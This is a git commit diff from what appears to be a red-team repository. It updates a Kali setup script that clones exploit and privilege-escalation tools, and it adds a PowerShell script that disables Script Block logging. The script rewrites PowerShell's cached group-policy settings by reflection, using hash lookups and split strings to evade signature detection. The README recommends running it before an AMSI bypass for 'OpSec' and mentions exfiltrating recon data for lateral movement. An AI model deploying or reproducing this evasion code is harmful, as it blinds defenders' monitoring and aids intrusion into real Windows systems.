Added Script Block logging bypass:

2019-06-19 15:48:24 +02:00 · 2019-06-19 15:48:24 +02:00 · afaac0b552
parent db9e879c44
commit afaac0b552
4 changed files with 220 additions and 12 deletions
--- a/linux/prepare-kali.sh
+++ b/linux/prepare-kali.sh
@ -72,7 +72,7 @@ wget https://gist.githubusercontent.com/mgeeky/8b7b1c8d9fe8be69978d774bddb6e382/

 cd $ROOT_DIR/tools

-mkdir {bruteforce,clouds,devops,deserialization,exploitdev,windows,redteam,recon,reversing,web,infra,fuzzers,linux,misc,ssl,sourceaudit,shells,wireless}
+mkdir {bruteforce,clouds,devops,deserialization,exploitdev,windows,redteam,recon,reversing,web,infra,fuzzers,linux,misc,privesc,ssl,sourceaudit,shells,wireless}

 git_clone https://github.com/mgeeky/Penetration-Testing-Tools

@ -203,6 +203,10 @@ git_clone https://github.com/wireghoul/graudit.git
 git_clone https://github.com/netbiosX/Checklists.git
 popd

+pushd privesc
+git_clone https://github.com/AusJock/Privilege-Escalation.git
+popd
+
 pushd recon
 git_clone https://github.com/FortyNorthSecurity/EyeWitness.git
 git_clone https://github.com/OWASP/Amass.git
@ -233,6 +237,11 @@ git_clone https://github.com/dxa4481/truffleHog.git
 popd

 pushd redteam
+git_clone https://github.com/jaredhaight/PSAttack.git
+cd PSAttack
+wget https://github.com/jaredhaight/PSAttack/releases/download/v1.99.1/PSAttack-1.99.1.zip
+unzip -d . PSAttack-1.99.1.zip
+cd ..
 git_clone https://github.com/danielbohannon/Invoke-Obfuscation.git
 git_clone https://github.com/FuzzySecurity/PowerShell-Suite.git 
 git_clone https://github.com/rvrsh3ll/Misc-Powershell-Scripts.git
@ -410,9 +419,11 @@ popd

 pushd windows
 git_clone https://github.com/M4ximuss/Powerless.git
-git_clone https://github.com/SecWiki/windows-kernel-exploit.git
+git_clone https://github.com/SecWiki/windows-kernel-exploits.git
 git_clone https://github.com/smgorelik/Windows-RCE-exploits.git
+git_clone https://github.com/abatchy17/WindowsExploits.git
 git_clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
+git_clone https://github.com/brianwrf/WinSystemHelper.git
 git_clone https://github.com/pentestmonkey/windows-privesc-check.git
 git_clone https://github.com/rootm0s/WinPwnage.git
 cd WinPwnage
@ -424,7 +435,7 @@ popd

 pushd wireless
 git_clone https://github.com/brav0hax/easy-creds.git
-git_clone https://github.com/s0lst1c3/eaphammer.git ; cd eaphammer ; ./kali-setup ; cd ..
+git_clone https://github.com/s0lst1c3/eaphammer.git ; cd eaphammer ; yes | ./kali-setup ; cd ..
 git_clone https://github.com/derv82/wifite2.git ; cd wifite2 ; python setup.py install ; cd ..
 popd

--- a/red-teaming/Disable-Amsi.ps1
+++ b/red-teaming/Disable-Amsi.ps1
@ -723,20 +723,62 @@ function Disable-Amsi
        return $false
    }

-    function BlockLoggingBypass
-    {
-        try
+    function Disable-ScriptLogging
+    { 
+        function ScriptLogging-Technique1
        {
            $asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)}
            $mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 12579468197}
            $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 12250760746}
-            $foo.SetValue($null, (New-Object 'System.Collections.Generic.HashSet[string]'))
-            return $true
+            $out = $foo.GetValue($null)
+            $k0 = ""
+            foreach ($item in $out){
+                if((Get-Hash($item)) -eq 32086076268) { # ScrXiptBloXckLogXging
+                    $k0 = $item
+                    break
+                }
+            }
+            #$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string]))
+            Write-Host "[+] Finished applying technique 1"
+            return $k0
        }
-        Catch
+
+        function ScriptLogging-Technique2($k0)
        {
-            return $false
+            $asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)}  # SysXtem.ManaXgement.AutomaXtion.dll
+            $mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 4572158998} # UXtils
+            $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 52485150955} # caXchedGrXoupPoXlicySettXings
+            if(-not $foo -or $foo -eq $null) {
+                $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 56006640029} # s_caXchedGrXoupPoXlicySettXings
+            }
+
+            if($foo) {
+                $cache = $foo.GetValue($null)
+                $k1 = $cache.Keys | ? {(Get-Hash($_.Split('\\')[-1])) -eq 32086076268} # ScrXiptBloXckLogXging
+                if($k1 -and $cache[$k1]) {
+                    $k2 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 45083803091} # EnabXleScrXiptBloXckLogXging
+                    $k3 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 70211596397} # EnabXleScrXiptBloXckInvocXationLogXging
+                    if($k2 -and $cache[$k1][$k2]) {
+                        $cache[$k1][$k2] = 0
+                    }
+                    if($k3 -and $cache[$k1][$k3]) {
+                        $cache[$k1][$k3] = 0
+                    }
+                }
+
+                $vl = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
+                $vl.Add('Enabl'+'e'+$k0, 0)
+                $k01 = $k0 -replace 'kL', 'kInvocationL'
+                $vl.Add('Ena'+'ble'+$k01, 0)
+                $cache['HKEY_LOCAL_M'+'ACHINE\Software\Policie'+'s\Microsoft\Wind'+'ows\PowerSh'+'ell\'+$k0] = $vl
+            }
+
+            Write-Host "[+] Finished applying technique 2"
        }
+
+        $out = ScriptLogging-Technique1
+        ScriptLogging-Technique2 $out
+        return $true
    }

    function Check-IsAdmin {
@ -760,11 +802,11 @@ function Disable-Amsi
        }

        if ($DontDisableBlockLogging -eq $false) {
-            if (BlockLoggingBypass) {
+            if (Disable-ScriptLogging) {
                Write-Host "[+] Disabled Script Block logging."
            }
            else {
-                Write-Host "[-] Could not disblae Script Block logging."
+                Write-Host "[-] Could not disable Script Block logging."
            }
        }

--- a/red-teaming/Disable-ScriptLogging.ps1
+++ b/red-teaming/Disable-ScriptLogging.ps1
@ -0,0 +1,151 @@
+#requires -version 5
+
+<#
+.SYNOPSIS
+    
+Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
+
+Author: Mariusz B. (@mgeeky)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in 
+an approach to avoid signatured or otherwise considered harmful keywords. 
+
+Notice: These techniques only disable Script Block logging within current process context. Tricks implemented 
+are not system-wide and not permament.
+
+Using a hash-lookup approach when determining prohibited symbol names, we are able
+to avoid relying on blacklisted values and having them hardcoded within the script. 
+This implementation iterates over all of the assemblies, their exposed types, methods and 
+fields in order to find those that are required but by their computed hash-value rather than
+direct name. Since hash-value computation algorithm was open-sources and is simple to 
+manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
+
+A simplest approach to alter return values coming out of Get-Hash would be to change the
+initial value of $val variable. 
+
+The script comes up with several techniques implemented. Triggers them one by one. Should one
+return successfully, the script is going to finish it's execution.
+
+The approaches implemented in this script heavily rely on the previous work of:
+
+- Ryan Cobb: https://cobbr.io/ScripXXXtBlock-Logging-BypXXXass.html
+- Ryan Cobb: https://cobbr.io/ScriptXXXBlock-Warning-Event-Logging-BypXXXass.html
+
+.EXAMPLES
+
+PS> Disable-ScriptLogging
+
+#>
+
+function Disable-ScriptLogging
+{
+    function bitshift 
+    {
+        param(
+            [Parameter(Mandatory,Position=0)]
+            [long]$x,
+
+            [Parameter(ParameterSetName='Left')]
+            [ValidateRange(0,[int]::MaxValue)]
+            [int]$Left,
+
+            [Parameter(ParameterSetName='Right')]
+            [ValidateRange(0,[int]::MaxValue)]
+            [int]$Right
+        )
+
+        $shift = if($PSCmdlet.ParameterSetName -eq 'Left')
+        { 
+            $Left
+        }
+        else
+        {
+            -$Right
+        }
+
+        $ret = [math]::Floor($x * [math]::Pow(2,$shift))
+        return [System.Convert]::TOUInt32($ret -band ([uint32]::MaxValue))
+    }
+
+    function Get-Hash 
+    {
+        param(
+            [Parameter(Mandatory = $true)]
+            [AllowEmptyString()]
+            [string]$name
+        )
+        if ($name.Length -eq 0)
+        {
+            return 0
+        }
+    
+        $name = $name.ToLower();
+        $val = 5381
+        for($i = 0; $i -lt $name.Length; $i++)
+        {
+            $n = bitshift $val -left 5
+            $val = ($n + $val) + [byte][char]$name[$i]
+        }
+
+        return $val
+    }
+
+    function ScriptLogging-Technique1
+    {
+        $asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)}
+        $mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 12579468197}
+        $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 12250760746}
+        $out = $foo.GetValue($null)
+        $k0 = ""
+        foreach ($item in $out){
+            if((Get-Hash($item)) -eq 32086076268) { # ScrXiptBloXckLogXging
+                $k0 = $item
+                break
+            }
+        }
+        #$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string]))
+        Write-Host "[+] Finished applying technique 1"
+        return $k0
+    }
+
+    function ScriptLogging-Technique2($k0)
+    {
+        $asm = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ((Get-Hash($_.Location.Split('\')[-1])) -eq 65764965518)}  # SysXtem.ManaXgement.AutomaXtion.dll
+        $mytype = $asm.GetTypes() | ? {(Get-Hash($_.Name)) -eq 4572158998} # UXtils
+        $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 52485150955} # caXchedGrXoupPoXlicySettXings
+        if(-not $foo -or $foo -eq $null) {
+            $foo = $mytype.GetFields([System.Reflection.BindingFlags]40) | ? {(Get-Hash($_.Name)) -eq 56006640029} # s_caXchedGrXoupPoXlicySettXings
+        }
+
+        if($foo) {
+            $cache = $foo.GetValue($null)
+            $k1 = $cache.Keys | ? {(Get-Hash($_.Split('\\')[-1])) -eq 32086076268} # ScrXiptBloXckLogXging
+            if($k1 -and $cache[$k1]) {
+                $k2 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 45083803091} # EnabXleScrXiptBloXckLogXging
+                $k3 = $cache[$k1].Keys | ? {(Get-Hash($_)) -eq 70211596397} # EnabXleScrXiptBloXckInvocXationLogXging
+                if($k2 -and $cache[$k1][$k2]) {
+                    $cache[$k1][$k2] = 0
+                }
+                if($k3 -and $cache[$k1][$k3]) {
+                    $cache[$k1][$k3] = 0
+                }
+            }
+
+            $vl = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
+            $vl.Add('Enabl'+'e'+$k0, 0)
+            $k01 = $k0 -replace 'kL', 'kInvocationL'
+            $vl.Add('Ena'+'ble'+$k01, 0)
+            $cache['HKEY_LOCAL_M'+'ACHINE\Software\Policie'+'s\Microsoft\Wind'+'ows\PowerSh'+'ell\'+$k0] = $vl
+        }
+
+        Write-Host "[+] Finished applying technique 2"
+    }
+
+    $out = ScriptLogging-Technique1
+    ScriptLogging-Technique2 $out
+}
--- a/red-teaming/README.md
+++ b/red-teaming/README.md
@ -39,6 +39,10 @@ PS > "amsiInitFailed"
 amsiInitFailed
 ```

+- **`Disable-ScriptLogging.ps1`** - Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in an approach to avoid signatured or otherwise considered harmful keywords. 
+
+*Warning:* This scriptlet should be launched first, before `Disable-Amsi.ps1` for better OpSec experience.
+

 - **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-*`, `Find-*` into _Clixml_ files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. **Warning**: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with _"Reconnaissance using SMB session enumeration"_ after you've launched `Invoke-UserHunter`.